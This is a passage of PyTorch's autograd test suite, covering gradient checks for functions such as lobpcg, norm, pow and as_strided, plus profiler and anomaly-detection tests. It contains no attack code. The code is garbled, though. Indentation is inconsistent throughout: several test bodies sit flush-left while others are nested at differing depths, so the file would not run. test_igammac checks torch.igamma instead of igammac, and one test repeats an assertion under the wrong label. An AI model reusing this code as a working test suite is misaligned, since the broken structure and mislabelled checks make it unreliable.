                          lambda a, b: torch.cat((a, b)),
                          True, f_args_variable, f_args_tensor)
def test_trapz(self):
    """gradcheck torch.trapz with explicit (non-uniform) x coordinates."""
    f_args_variable = (torch.randn(2, 3, dtype=torch.double, requires_grad=True),
                       torch.tensor([[1.0, 2.0, 5.5], [2.3, 0.5, 6.2]], dtype=torch.double, requires_grad=True))
    f_args_tensor = deepcopy(unpack_variables(f_args_variable))
    run_functional_checks(self, "test_trapz", "trapz",
                          lambda y, x: torch.trapz(y, x),
                          True, f_args_variable, f_args_tensor)
def test_var_mean_differentiable(self):
    """The fused torch.var_mean matches separate var()/mean() in both
    forward values and backward gradients."""
    dim = [2, 4]
    keepdim = False
    input1 = torch.randn(3, 4, 5, 6, 2, 3, requires_grad=True)
    input2 = deepcopy(input1)
    var1, mean1 = torch.var_mean(input1, dim=dim, keepdim=keepdim)
    var2 = input2.var(dim=dim, keepdim=keepdim)
    mean2 = input2.mean(dim=dim, keepdim=keepdim)
    grad = torch.randn(3, 4, 6, 3, requires_grad=True)
    # combine var and mean so one backward exercises both outputs
    r1 = var1 * var1 * mean1 * mean1
    r2 = var2 * var2 * mean2 * mean2
    self.assertTrue(torch.allclose(r1, r2, rtol=0.01, atol=0.0))
    torch.autograd.backward(r1, grad)
    torch.autograd.backward(r2, grad)
    self.assertTrue(torch.allclose(input1.grad, input2.grad, rtol=0.01, atol=0.0))
@slowTest
@skipIfNoLapack
def test_lobpcg(self):
    """gradcheck/gradgradcheck torch.lobpcg over several batch shapes and
    eigenpair counts, with sign normalization to remove eigenvector sign
    non-determinism; also checks that A.grad is symmetric."""
    def func(k, A, largest=True, B=None):
        X_shape = list(A.shape)
        X_shape[-1] = k
        # fixed initial eigenspace so lobpcg is deterministic
        X = torch.eye(A.size(-2), k, dtype=A.dtype, device=A.device)
        if A.dim() > 2:
            X = X.expand(X_shape)
        D, U = torch.lobpcg(A=A, k=k, B=B, X=X)
        # LOBPCG uses a random initial eigenspace approximation
        # if parameter `X` is not provided.
        # This may cause a non-deterministic behavior
        # when it comes to the sign of an eigenvector
        # (note if v is an eigenvector, so is -v),
        # hence we eliminate this non-determinism
        # by making sure that each column of U
        # gets multiplied by the sign of its max (in absolute value) element.
        # Also, gradcheck changes the content of the input by +/- eps (default to 1e-06)
        # to compute the numerical gradient which can also cause the signs to flip.
        _, idx = U.abs().max(-2, keepdim=True)
        sign = U.gather(-2, idx).sign()
        U = U * sign
        return D, U
    def run_symeig_test(k, sizes, largest=True):
        # symmetric positive-ish matrix A = M M^T / 10
        A = torch.rand(*sizes).double()
        A = A.matmul(A.transpose(-1, -2)) / 10
        A.requires_grad_(True)
        gradcheck(lambda A: func(k, A, largest), A, check_batched_grad=False)
        # Custom gradient vectors for better stability due to some
        # non-determinism in the lobpcg's forward.
        # Note it is not required if symeig is in forward instead (tested).
        D_grad = torch.rand(*A.shape[:-2], k) / 100
        U_grad = torch.rand(*A.shape[:-1], k) / 100
        gradgradcheck(lambda A: func(k, A, largest), A, [D_grad, U_grad], atol=1e-4, check_batched_grad=False)
        # check whether A.grad is symmetric
        A = A.detach().requires_grad_(True)
        D, U = func(k, A, largest)
        (D.sum() + U.sum()).backward()
        self.assertEqual(A.grad, A.grad.transpose(-1, -2))
    # the tests below take about 1-2 minutes to finish,
    # but we want to be extra sure that the backward is correct.
    for largest in [True, False]:
        run_symeig_test(1, (6, 6), largest=largest)
        run_symeig_test(1, (2, 6, 6), largest=largest)
        run_symeig_test(1, (2, 2, 6, 6), largest=largest)
        run_symeig_test(2, (6, 6), largest=largest)
        run_symeig_test(2, (2, 6, 6), largest=largest)
        run_symeig_test(2, (2, 2, 6, 6), largest=largest)
        run_symeig_test(3, (9, 9), largest=largest)
        run_symeig_test(3, (2, 9, 9), largest=largest)
        run_symeig_test(3, (2, 2, 9, 9), largest=largest)
def test_variable_traverse(self):
    """The GC can traverse reference cycles through intermediary graph
    Variables without freeing tensors the graph still needs; backward
    after gc.collect() must not segfault."""
    def get_out_and_unrefed_cycle():
        inp = torch.randn(10, requires_grad=True)
        tmp = inp.view(10, 1)
        out = tmp.view(10)
        # Create a reference cycle that contains an
        # intermediary Variable in the graph
        my_list = []
        my_list.append(tmp)
        my_list.append(my_list)
        return out
    out = get_out_and_unrefed_cycle()
    gc.collect()
    # This will segfault if things have been erroneously released
    out.backward(torch.randn(out.size()))
def test_norm_subgradient(self):
    """The subgradient of norm(p) at an all-zero input is taken to be 0
    (no NaN/inf leaks into the gradient)."""
    def check(shape, p):
        zeros = torch.zeros(*shape, requires_grad=True)
        zeros.norm(p).backward()
        self.assertEqual(zeros.grad.abs().sum(), 0)

    for shape, p in [((10,), 2), ((10, 10), 2), ((10,), 3),
                     ((10,), 1), ((10,), 1.5), ((10,), inf)]:
        check(shape, p)
def test_norm_inf_subgradient(self):
    """The inf-norm subgradient splits evenly among the tied maximal
    elements (and is zero for an all-zero input)."""
    def run_test(input, expected, dim=None):
        x = torch.tensor(input, requires_grad=True)
        out = x.norm(inf, dim=dim, keepdim=True)
        out.backward(torch.ones(out.size()))
        self.assertEqual(x.grad, expected)
    run_test([0., 0., 0.], [0., 0., 0.])
    run_test([1., 0., 1.], [0.5, 0., 0.5])
    run_test([[1., 0., 1.], [0., 1., 1.]], [[0.25, 0., 0.25], [0., 0.25, 0.25]])
    run_test([[1., 0., 1.], [0., 1., 0.]], [[0.5, 0., 0.5], [0., 1., 0.]], (1,))
    run_test(torch.ones((2, 2, 2)), torch.full((2, 2, 2), 0.25), (0, 2))
def test_pow_zero_tensor_gradient(self):
    """d/dx x**p at x == 0 is defined to be 0 for tensor and scalar
    exponents alike (no NaN in the gradient)."""
    def check(shape, exponent):
        base = torch.zeros(*shape, requires_grad=True)
        base.pow(exponent).sum().backward()
        self.assertEqual(base.grad.abs().sum(), 0)

    check((10,), torch.zeros(10))
    check((10, 10), torch.zeros(10, 10))
    check((10,), 0)
def test_pow_scalar_base(self):
    """gradcheck pow with a scalar base and a tensor exponent."""
    a = torch.arange(1, 13, dtype=torch.double).view(3, 4).requires_grad_()
    gradcheck(lambda a: torch.pow(2, a), (a,))
def test_sinc(self):
    # The derivative of sinc(x) at x=0 has to be special cased.
    # A naive computation will result in 0/0 -> NaN.
    # We also need to be careful when we are very close to 0, as the
    # derivative's denominator is squared, and there are some floats
    # that are positive and whose squares are zero.
    a = torch.tensor([0.0, torch.finfo(torch.double).tiny, 1.0],
                     dtype=torch.double,
                     requires_grad=True)
    gradcheck(torch.sinc, a)
def test_igamma(self):
    """gradcheck/gradgradcheck torch.igamma w.r.t. x only."""
    # 1e-3 offset to avoid zeros
    # NOTE: derivative for s is not implemented
    s = (torch.rand(100, dtype=torch.double) + 1e-3)
    x = (torch.rand(100, dtype=torch.double) + 1e-3).requires_grad_()
    gradcheck(torch.igamma, (s, x))
    gradgradcheck(torch.igamma, (s, x))
def test_igammac(self):
# 1e-3 offset to avoid zeros in s
# NOTE: derivative for s is not implemented
s = (torch.rand(100, dtype=torch.double) + 1e-3)
x = (torch.rand(100, dtype=torch.double)).requires_grad_()
gradcheck(torch.igamma, (s, x))
gradgradcheck(torch.igamma, (s, x))
def test_profiler(self):
    """The profiler records aten::mul and aten::add for ``x * 2 + 4``, and
    torch.autograd._profiler_enabled() reflects whether we are inside the
    profiling context."""
    x = torch.randn(10, 10)
    with profile(use_kineto=kineto_available()) as p:
        self.assertTrue(torch.autograd._profiler_enabled())
        y = x * 2 + 4
    self.assertFalse(torch.autograd._profiler_enabled())
    names = ['aten::mul', 'aten::add']
    found_indices = set()
    for evt in p.function_events:
        if evt.name in names:
            found_indices.add(names.index(evt.name))
    # assertEquals is a deprecated unittest alias; use assertEqual
    self.assertEqual(len(found_indices), len(names))
def test_profiler_seq_nr(self):
    """Forward ops get sequence numbers and their backward nodes carry the
    matching numbers; nested ops (aten::empty) get no sequence number."""
    with profile(use_kineto=kineto_available()) as p:
        x = torch.randn(10, 10, requires_grad=True)
        y = torch.randn(10, 10, requires_grad=True)
        z = x + y
        s = z.sum()
        s.backward()
    print(p.key_averages().table(
        sort_by="self_cpu_time_total", row_limit=-1))
    # expecting aten::add, aten::sum to have the sequence numbers,
    # expecting the corresponding backward nodes to have the same numbers
    # as the forward ops
    add_seq_nr = -1
    sum_seq_nr = -1
    found_add = found_sum = False
    found_bwd_add = found_bwd_sum = False
    found_empty = False
    for e in p.function_events:
        if e.name == "aten::add":
            add_seq_nr = e.sequence_nr
            self.assertFalse(found_add)
            found_add = True
        elif e.name == "aten::sum":
            sum_seq_nr = e.sequence_nr
            self.assertFalse(found_sum)
            found_sum = True
        elif "Add" in e.name and "Backward" in e.name:
            self.assertEqual(e.sequence_nr, add_seq_nr)
            self.assertFalse(found_bwd_add)
            found_bwd_add = True
        elif "Sum" in e.name and "Backward" in e.name:
            self.assertEqual(e.sequence_nr, sum_seq_nr)
            self.assertFalse(found_bwd_sum)
            found_bwd_sum = True
        # check that nested ops (e.g. empty) don't have
        # sequence number
        if e.name == "aten::empty":
            self.assertEqual(e.sequence_nr, -1)
            found_empty = True
    self.assertGreaterEqual(add_seq_nr, 0)
    self.assertGreaterEqual(sum_seq_nr, 0)
    self.assertNotEqual(add_seq_nr, sum_seq_nr)
    self.assertTrue(found_add)
    self.assertTrue(found_sum)
    self.assertTrue(found_bwd_add)
    self.assertTrue(found_bwd_sum)
    self.assertTrue(found_empty)
def test_profiler_unboxed_only(self):
    """Smoke test: profiling an unboxed-only op (resize_) must not crash;
    the recorded events themselves are not inspected."""
    x = torch.rand(3, 4)
    with torch.autograd.profiler.profile(use_kineto=kineto_available()) as prof:
        x.resize_([3, 2])
def test_profiler_propagation(self):
    """record_function scopes propagate across torch.jit._fork/_wait, even
    when the continuation runs on a different thread."""
    def foo(x):
        with record_function("in_foo") as rf:
            return x * 2
    x = torch.rand(3, 4)
    traced_foo = torch.jit.trace(foo, x)
    def bar(x):
        with record_function("in_bar") as rf:
            # we expect that profiler will be able
            # propagate across fork
            fut = torch.jit._fork(traced_foo, x)
            y = torch.jit._wait(fut)
            # note: continuation (and rf's end) can
            # be executed in a different thread
            with record_function("in_bar_after_wait") as rf2:
                y = y * 2
            return y
    traced_bar = torch.jit.trace(bar, x)
    with profile(use_kineto=kineto_available()) as p:
        traced_bar(x)
    found_foo = False
    found_bar = False
    found_bar_after_wait = False
    for info in p.function_events:
        if info.name == "in_foo":
            self.assertFalse(found_foo)
            found_foo = True
        elif info.name == "in_bar":
            self.assertFalse(found_bar)
            found_bar = True
        elif info.name == "in_bar_after_wait":
            self.assertFalse(found_bar_after_wait)
            found_bar_after_wait = True
    self.assertTrue(found_foo)
    self.assertTrue(found_bar)
    self.assertTrue(found_bar_after_wait)
def test_record_function_callbacks(self):
    """A record_function("foo") scope appears exactly once in the
    profiler's events."""
    data = torch.randn(10, 10)
    with profile(use_kineto=kineto_available()) as prof:
        with record_function("foo"):
            y = data * 2 + 4
    matching = [evt for evt in prof.function_events if "foo" in evt.name]
    self.assertEqual(matching[0].count, 1)
def test_profiler_aggregation_fake(self):
    """Feed hand-built FunctionEvents into an EventList and verify that
    _populate_cpu_children() nests overlapping ranges correctly.

    Cleanups: the loop variables no longer shadow the builtins ``id`` and
    ``range``, and the bare ``assert`` statements (which are stripped under
    ``python -O``) are replaced with unittest assertions.
    """
    events = EventList()
    next_id = [0]  # mutable cell so the closure can count upward

    def get_id():
        next_id[0] = next_id[0] + 1
        return next_id[0]

    # [[thread_id, [(start, end, id), ....]], ...]
    # Using list instead of a dict so order is guaranteed for any Python
    # version
    threads = [
        [1, [(0, 1, get_id()), (1, 2, get_id())]],
        [0, [(0, 2, get_id()), (1, 2, get_id()), (1, 3, get_id())]],
    ]
    for thread, ranges in threads:
        for rng in ranges:
            self.assertEqual(len(rng), 3)
            events.append(
                FunctionEvent(
                    id=rng[2],
                    node_id=0,
                    name="",
                    thread=thread,
                    start_us=rng[0],
                    end_us=rng[1],
                )
            )
    events._populate_cpu_children()
    # Note that [1, 3] pushes out [0, 2] first. Then we record [1, 2]
    # as a child of [1, 3]
    res = [[], [], [], [], [4]]

    def get_children_ids(event):
        return [child.id for child in event.cpu_children]

    self.assertEqual([get_children_ids(event) for event in events], res)
def test_profiler_aggregation_table(self):
    """
    Test if the profiling result is aggregated for `str(prof)`
    See: https://github.com/pytorch/pytorch/issues/37500
    """
    data = torch.randn(1024)
    with torch.autograd.profiler.profile(use_kineto=kineto_available()) as prof:
        torch.einsum("i->", data)
    # str(prof) must route through the same aggregation as table()
    self.assertEqual(prof.table(), str(prof))
def test_profiler_function_event_avg(self):
    """FunctionEventAvg aggregates counts/totals from added events and from
    another (self-)added average, and reports correct per-call averages."""
    avg = FunctionEventAvg()
    avg.add(FunctionEvent(id=0, node_id=0, name="foo", thread=0, start_us=10, end_us=15))
    avg.add(FunctionEvent(id=1, node_id=0, name="foo", thread=0, start_us=20, end_us=30))
    # adding the avg to itself doubles the aggregate stats
    avg.add(avg)
    self.assertEqual(avg.key, "foo")
    # aggregate stats
    self.assertEqual(avg.count, 4)
    self.assertEqual(avg.cpu_time_total, 30)
    self.assertEqual(avg.self_cpu_time_total, 30)
    self.assertEqual(avg.cuda_time_total, 0)
    # average stats
    self.assertEqual(avg.cpu_time, 7.5)
    self.assertEqual(avg.cuda_time_total, 0)
    def test_profiler_shapes(self):
        """Profile two chained Linear layers with record_shapes=True and check
        that each aten::linear event recorded its [input, weight, bias] shapes."""
        print("")
        layer1 = torch.nn.Linear(20, 30)
        layer2 = torch.nn.Linear(30, 40)
        input = torch.randn(128, 20)
        with profile(record_shapes=True, use_kineto=kineto_available()) as prof:
            layer2(layer1(input))
        print(prof.function_events)
        # Expected [input, weight, bias] shapes for layer1 and layer2 respectively.
        linear_expected_shapes = [
            [[128, 20], [30, 20], [30]],
            [[128, 30], [40, 30], [40]],
        ]
        found_indices = set()
        for event in prof.function_events:
            if event.name == "aten::linear":
                self.assertTrue(event.input_shapes in linear_expected_shapes)
                found_indices.add(linear_expected_shapes.index(event.input_shapes))
        # Both linear invocations must have been observed.
        self.assertEqual(len(found_indices), len(linear_expected_shapes))
    def test_profiler_aggregation_lstm(self):
        """Smoke-test profiler aggregation/reporting on repeated LSTM runs:
        various table() renderings, python-vs-profiler timing comparison,
        and chrome trace export (skipped on Windows)."""
        print("")
        rnn = torch.nn.LSTM(10, 20, 2)
        total_time_s = 0
        with profile(record_shapes=True, use_kineto=kineto_available()) as prof:
            for i in range(20):
                input = torch.randn(5, 3, 10)
                h = torch.randn(2, 3, 20)
                c = torch.randn(2, 3, 20)
                start = time.time()
                rnn(input, (h, c))
                end = time.time()
                total_time_s += end - start
        # Exercise several table() variants; output is printed, not asserted.
        print(prof.table(
            sort_by="self_cpu_time_total", row_limit=10, header="TEST"))
        print(prof.key_averages(group_by_input_shape=True).table(
            sort_by="self_cpu_time_total", row_limit=10))
        print(prof.table(
            sort_by="self_cpu_time_total", row_limit=10, max_src_column_width=300, header="TEST", top_level_events_only=True))
        print(prof.key_averages(group_by_input_shape=True).table(
            sort_by="self_cpu_time_total", row_limit=10, top_level_events_only=True))
        total_time_us = total_time_s * 1000.0 * 1000.0  # make it us which is profiler default
        print(
            "Total time based on python measurements: ",
            format_time(total_time_us)
        )
        print(
            "CPU time measurement python side overhead: {:.2f}%".format(
                (total_time_us / prof.self_cpu_time_total - 1.0) * 100.0
            )
        )
        # NamedTemporaryFile cannot be reopened by name on Windows, so only
        # exercise the chrome-trace export elsewhere.
        if sys.platform != "win32":
            with tempfile.NamedTemporaryFile() as trace_file:
                prof.export_chrome_trace(trace_file.name)
    def test_record_function(self):
        """record_function context managers and decorators must show up as
        profiler events, interleaved in order with the aten ops they wrap."""
        x = torch.randn(10, 10)
        def forward(x):
            with record_function("outer"):
                y = x * 2 + 4
                with record_function("inner"):
                    y = y - 1
            y = y / 1
        forward(x)
        with profile(use_kineto=kineto_available()) as p:
            forward(x)
        events = p.function_events
        important_events = [
            'outer',
            'aten::mul',
            'aten::add',
            'inner',
            'aten::sub',
            'aten::div'
        ]
        # Scan events in order; each important event must appear after the
        # previous one (other events may be interleaved).
        idx = 0
        for info in events:
            if info.name == important_events[idx]:
                idx = idx + 1
            if idx == len(important_events):
                break
        self.assertEqual(idx, len(important_events))
        # We can also use record_function to decorate arbitrary function
        @record_function('my_func')
        def f(x, y):
            return x + y
        with profile(use_kineto=kineto_available()) as p:
            f(1, 2)
        self.assertTrue('my_func' in str(p))
    def test_record_function_multithreaded(self):
        """Out-of-order __enter__/__exit__ of overlapping record_function
        scopes (as can happen across threads) must not raise."""
        rf = record_function("outer")
        rf.__enter__()
        with record_function("inner"):
            # test that exiting the record function after starting another one
            # doesn't throw.
            rf.__exit__(None, None, None)
        with record_function("inner"):
            rf.__enter__()
        # test that exiting the record function after ending another one
        # doesn't throw.
        rf.__exit__(None, None, None)
def test_dir(self):
x = torch.randn(10, 10)
keys = dir(x)
self.assertIn('shape', keys)
# real and imag are only implemented for complex tensors.
y = torch.randn(10, 10, dtype=torch.cfloat)
for key in ['real', 'imag']:
self.assertRaises(RuntimeError, lambda: hasattr(x, key))
self.assertTrue(hasattr(y, key))
keys.remove(key)
for key in keys:
self.assertTrue(hasattr(x, key))
    def test_as_strided(self):
        """gradcheck/gradgradcheck as_strided over views, expands, overlapping
        and transposed layouts, guarding against storage-resizing test cases."""
        def test(x, prepro_fn, size, strides, offset=None):
            x = x.to(torch.double).detach().requires_grad_()
            # Check that forward will **not** resize storage because it may
            # cause NaN in output and fail numerical Jacobian check consequently
            with torch.no_grad():
                y = prepro_fn(x) if prepro_fn is not None else x
                max_offset = sum((si - 1) * st for si, st in zip(size, strides))
                max_offset += offset if offset is not None else y.storage_offset()
                assert max_offset < len(y.storage()), "test case resizes storage"
            def closure(x):
                if prepro_fn is not None:
                    x = prepro_fn(x)
                return x.as_strided(size, strides, offset)
            gradcheck(closure, [x])
            gradgradcheck(closure, [x])
        # test
        test(torch.arange(0, 25), lambda x: x.view(5, 5), [3, 3], [6, 2], 2)
        # test crazy stride at dim with size 1 case
        test(torch.randn(12), None, [1, 2, 1, 5], [0, 5, 100, 1], 2)
        # test expand case
        test(torch.randn(5), None, [3, 3, 3], [0, 1, 0], 2)
        test(torch.randn(5), None, [3, 3, 3], [0, 0, 0], 4)
        test(torch.randn(5), lambda x: x.expand(5, 5), [5, 5], [0, 1], 0)
        # test non-expand overlapping case
        test(torch.randn(35), None, [6, 6], [5, 1], 2)
        test(torch.randn(15), None, [3, 2], [3, 6], 2)
        # test transpose case
        test(torch.randn(3, 4), None, [4, 3], [1, 4])
        # test "getting things outside the input" case
        x = torch.randn(6, 2)
        test(x[3:], None, [3, 2], [2, 1], 0)  # should be all zeros
        self.assertEqual(x[3:].as_strided([3, 2], [2, 1], 0), x[:3])
        # test select on expanded input case
        test(torch.randn(2, 3), lambda x: x.expand(10, 2, 3), [2, 3], [3, 1], 0)
def _test_lerp_tensor_weights(self, cast):
def construct_inputs(*shapes):
start = cast(torch.randn(shapes[0], dtype=torch.double)).requires_grad_()
end = cast(torch.randn(shapes[1], dtype=torch.double)).requires_grad_()
weight = cast(torch.randn(shapes[2], dtype=torch.double)).requires_grad_()
return [start, end, weight]
all_test_shapes = [((3, 3, 3), (3, 3, 3), (3, 3, 3)), # no broadcasting
((3,), (3, 3, 3), (3, 3, 3)), # start broadcasting - 1
((3, 3, 3), (3,), (3, 3, 3)), # end broadcasting - 1
((3, 3, 3), (3, 3, 3), (3,)), # weight broadcasting - 1
((), (3, 3, 3), (3, 3, 3)), # start broadcasting - 2
((3, 3, 3), (), (3, 3, 3)), # end broadcasting - 2
((3, 3, 3), (3, 3, 3), ()), # weight broadcasting - 2
((3, 3), (3, 3, 3), (3,))] # all broadcasting
for shapes in all_test_shapes:
cur_inputs = construct_inputs(*shapes)
gradcheck(torch.lerp, cur_inputs)
gradgradcheck(torch.lerp, cur_inputs)
def test_lerp_tensor_weights(self):
self._test_lerp_tensor_weights(lambda t: t)
    def test_reduce_dtype(self):
        """Gradients of reductions must match whether or not the op upcasts
        via its dtype= argument, and the grad dtype must stay that of the input."""
        def test_reduction(op, has_no_dim, takes_dtype=True):
            x = torch.randn(3, 3, dtype=torch.float, requires_grad=True)
            if has_no_dim:
                # Full reduction: grad with and without dtype=double must agree.
                grad1, = torch.autograd.grad([op(x)], [x])
                grad2, = torch.autograd.grad([op(x, dtype=torch.double)], [x])
                self.assertEqual(grad1, grad2)
                self.assertEqual(grad2.dtype, torch.float)
            gi = torch.randn(op(x, dim=0).shape, dtype=torch.float)
            grad1, = torch.autograd.grad([op(x, dim=0)], [x], gi)
            if takes_dtype:
                grad2, = torch.autograd.grad([op(x, dim=0, dtype=torch.double)], [x], gi.double())
            else:
                # Op has no dtype= kwarg: upcast the input instead.
                grad2, = torch.autograd.grad([op(x.double(), dim=0)], [x], gi.double())
            self.assertEqual(grad1, grad2)
            self.assertEqual(grad2.dtype, torch.float)
        test_reduction(torch.sum, True)
        test_reduction(torch.prod, True)
        test_reduction(torch.cumsum, False)
        test_reduction(torch.cumprod, False)
        test_reduction(torch.logcumsumexp, False, takes_dtype=False)
def test_inplace_view_saved_output(self):
# Test an in-place operation on a view in which the in-place op saves
# its output. Previously, this created a reference cycle.
dealloc = [0]
class IncrementOnDelete(object):
def __del__(self):
dealloc[0] += 1
def test():
root = torch.randn(3, 3, requires_grad=True)
copy = root.clone()
copy.grad_fn.register_hook(IncrementOnDelete())
view = copy.view(9)
torch.nn.functional.relu(view, inplace=True)
test()
self.assertEqual(dealloc[0], 1)
def test_inplace_view_leaf_errors(self):
# Issue #21875: Fail faster (when we try to modify the view vs. in backward())
x = torch.zeros(1, requires_grad=True)
y = x.view_as(x)
with self.assertRaisesRegex(RuntimeError,
"a view of a leaf Variable that "
"requires grad is being used in "
"an in-place operation."):
y.add_(1)
    def test_inplace_view_backward(self):
        """Double backward through in-place ops on views must not raise and
        must route gradients through the correct backward nodes."""
        # Issue #10532: Make sure that this does not raise RuntimeError.
        net = nn.Sequential(
            nn.InstanceNorm2d(2),
            nn.ReLU(True)
        )
        x = torch.tensor([[[[1.0, 1.0]]]], requires_grad=True)
        g, = torch.autograd.grad(net(x).pow(2), [x], grad_outputs=x.new_ones(x.shape) , create_graph=True)
        torch.autograd.grad(g.sum(), [x])
        self.assertEqual(x, torch.tensor([[[[1.0, 1.0]]]]))
        # https://discuss.pytorch.org/t/freeing-buffer-strange-behavior/31955/8
        inputs = torch.ones((1, 3, 256, 256), requires_grad=True)
        tmp1 = (inputs + 1).view_as(inputs)
        tmp2 = torch.nn.functional.threshold(tmp1, 0., 0., True)
        prob_interpolated = torch.sigmoid(tmp2)
        gradients = torch.autograd.grad(outputs=prob_interpolated, inputs=inputs,
                                        grad_outputs=torch.ones(prob_interpolated.size()),
                                        create_graph=True, retain_graph=True)[0]
        gradient_penalty = gradients.sum()
        gradient_penalty.backward()
        # Walk the autograd graph to confirm the in-place threshold produced
        # the expected double-backward node.
        fn = gradient_penalty.grad_fn.next_functions[0][0].next_functions[1][0]
        self.assertEqual(fn.name(), "ThresholdBackwardBackward")
    def test_inplace_view_weak_grad_fn(self):
        """A view's grad_fn must survive deletion of the view tensor itself."""
        # Issue 23502: Test that b's grad_fn is preserved.
        a = torch.arange(10.0, requires_grad=True)
        b = a.narrow(0, 0, 2).clone().view(-1)
        b.relu_()
        c = b.clone()
        del b
        gc.collect()
        s = c.sum()
        s.backward()
        self.assertEqual(s, torch.tensor(1.0))
        # Issue #21875: Fail faster (when we try to modify the view vs. in backward())
        a = torch.rand(10, requires_grad=True).narrow(0, 0, 10)
        with self.assertRaises(RuntimeError):
            b = a.relu_()
def test_mul_out(self):
a = torch.randn(2, 2, requires_grad=True)
b = torch.randn(2, 2, requires_grad=True)
x = torch.zeros_like(a)
# out=... functions don't support automatic differentiation currently
self.assertRaisesRegex(RuntimeError, 'out=', lambda: torch.mul(a, b, out=x))
# the inputs can require grad if we're in no_grad() mode
with torch.no_grad():
torch.mul(a, b, out=x)
self.assertEqual(x, a * b)
def test_mul_out_result_requires_grad(self):
a = torch.randn(2, 2)
b = torch.randn(2, 2)
x = torch.zeros(2, 2, requires_grad=True)
# we should throw an exception if the output requires grad
self.assertRaisesRegex(RuntimeError, 'out=', lambda: torch.mul(a, b, out=x))
def test_diagonal_derivative_requires_grad(self):
# test that the backward requires grad
# we do this is because diagonal_backward uses inplace
# operations and gradgradcheck does not catch whether
# they works as expected (it will succeed even if
# the gradient has requires_grad == False
a = torch.randn(5, 6, requires_grad=True)
b = torch.diagonal(a)**2
c = b.sum()
d, = torch.autograd.grad(c, a, retain_graph=True, create_graph=True)
self.assertTrue(d.requires_grad)
    def test_anomaly_detect_nan(self):
        """detect_anomaly must flag NaNs produced in backward, naming the
        failing output index and (when available) the forward call site."""
        size = 10
        class MyFunc(Function):
            @staticmethod
            def forward(ctx, inp1, inp2, fail_0th):
                ctx.fail_0th = fail_0th
                return inp1.sum(0, keepdim=True)
            @staticmethod
            def backward(ctx, gO):
                gI = gO.clone().expand(size)
                gI[0] = 0
                gI[0] /= 0  # Generate a nan
                if ctx.fail_0th:
                    return gI, None, None
                else:
                    return None, gI, None
        inp = torch.rand(size, requires_grad=True)
        out = MyFunc.apply(inp, inp, True)
        # Without detect_anomaly the NaN goes unchecked.
        out.backward()  # Should not fail
        inp = torch.rand(size, requires_grad=True)
        out = MyFunc.apply(inp, inp, True)
        with self.assertRaisesRegex(RuntimeError, "Function 'MyFuncBackward' returned nan values in its 0th output."):
            with warnings.catch_warnings(record=True) as w:
                with detect_anomaly():
                    out.backward()
            # forward ran outside anomaly mode, so no traceback was recorded.
            self.assertIn('No forward pass information', str(w[0].message))
        inp = torch.rand(size, requires_grad=True)
        with self.assertRaisesRegex(RuntimeError, "Function 'MyFuncBackward' returned nan values in its 1th output."):
            with warnings.catch_warnings(record=True) as w:
                with detect_anomaly():
                    out = MyFunc.apply(inp, inp, False)
                    out.backward()
            # forward ran inside anomaly mode: its call site is reported.
            self.assertIn('MyFunc.apply', str(w[0].message))
    def test_nested_anomaly_detect_nan(self):
        """detect_anomaly in double backward must report both the inner
        function that produced the NaN and its parent in the forward trace."""
        size = 10
        class MyFunc(Function):
            @staticmethod
            def forward(ctx, inp1, fail_0th):
                ctx.fail_0th = fail_0th
                ctx.save_for_backward(inp1)
                return inp1.sum(0, keepdim=True)
            @staticmethod
            def backward(ctx, gO):
                inp, = ctx.saved_tensors
                fail_0th = ctx.fail_0th
                g = gO.clone().expand(size)
                # Backward itself calls a custom Function, nesting the graphs.
                gI = MyFunc2.apply(g * inp, g + inp, fail_0th)
                return gI, None
        class MyFunc2(Function):
            @staticmethod
            def forward(ctx, inp1, inp2, fail_0th):
                ctx.fail_0th = fail_0th
                return inp1 * 2.0 + inp2
            @staticmethod
            def backward(ctx, gO):
                fail_0th = ctx.fail_0th
                g1 = gO.clone()
                g2 = gO.clone()
                g1[0] = 0
                g2[0] = 0
                # generate a nan
                if fail_0th:
                    g1[0] /= 0
                else:
                    g2[0] /= 0
                return g1, g2, None
        inp = torch.rand(size, requires_grad=True)
        out = MyFunc.apply(inp, True)
        ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
        gsum = ginp.sum()
        # Without detect_anomaly the NaN goes unchecked.
        gsum.backward()  # should not fail
        inp = torch.rand(size, requires_grad=True)
        out = MyFunc.apply(inp, True)
        ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
        gsum = ginp.sum()
        with warnings.catch_warnings(record=True) as w:
            with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 0th output."):
                with detect_anomaly():
                    gsum.backward()
        # w[1]: forward (first backward) ran outside anomaly mode.
        self.assertIn('No forward pass information', str(w[1].message))
        inp = torch.rand(size, requires_grad=True)
        with warnings.catch_warnings(record=True) as w:
            with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 1th output."):
                with detect_anomaly():
                    out = MyFunc.apply(inp, False)
                    ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
                    gsum = ginp.sum()
                    gsum.backward()
        # Everything ran in anomaly mode: both nesting levels are reported.
        self.assertIn('MyFunc2.apply', str(w[1].message))
        self.assertIn('MyFunc.apply', str(w[2].message))
    def test_anomaly_grad_warnings(self):
        """Anomaly-mode warnings must surface even when an error follows:
        captured as warnings normally, or printed to stderr when the warning
        filter turns warnings into errors."""
        # PyTorch won't throw warnings if there is an error
        # but we'd want to at least see them in stderr
        class StdErrDiverter:
            def __enter__(self):
                self.stderr_orig = sys.stderr
                self.stderr_new = io.StringIO()
                sys.stderr = self.stderr_new
                return self
            def __exit__(self, *args):
                self.captured = self.stderr_new.getvalue()
                sys.stderr = self.stderr_orig
        # if the warnings don't throw, they will be handled as regular warnings
        with self.assertRaisesRegex(RuntimeError,
                                    "one of the variables needed for gradient computation has been "
                                    "modified by an inplace operation"):
            with warnings.catch_warnings(record=True) as w:
                with detect_anomaly():
                    a = torch.randn(5, requires_grad=True)
                    d1 = a + 1
                    d2 = d1 ** 2
                    d1 += 1
                    torch.autograd.grad(d2.sum(), a)
        self.assertEqual(len(w), 2)
        self.assertIn('Anomaly Detection has been enabled', str(w[0].message))
        self.assertIn('Error detected in PowBackward0', str(w[1].message))
        # if the warning throws, it will be printed to sys.stderr
        with self.assertRaisesRegex(RuntimeError,
                                    "one of the variables needed for gradient computation has been "
                                    "modified by an inplace operation"):
            with warnings.catch_warnings(record=True) as w:
                with detect_anomaly():
                    warnings.simplefilter("error")
                    with StdErrDiverter() as s:
                        a = torch.randn(5, requires_grad=True)
                        d1 = a + 1
                        d2 = d1 ** 2
                        d1 += 1
                        torch.autograd.grad(d2.sum(), a)
        self.assertEqual(len(w), 1)
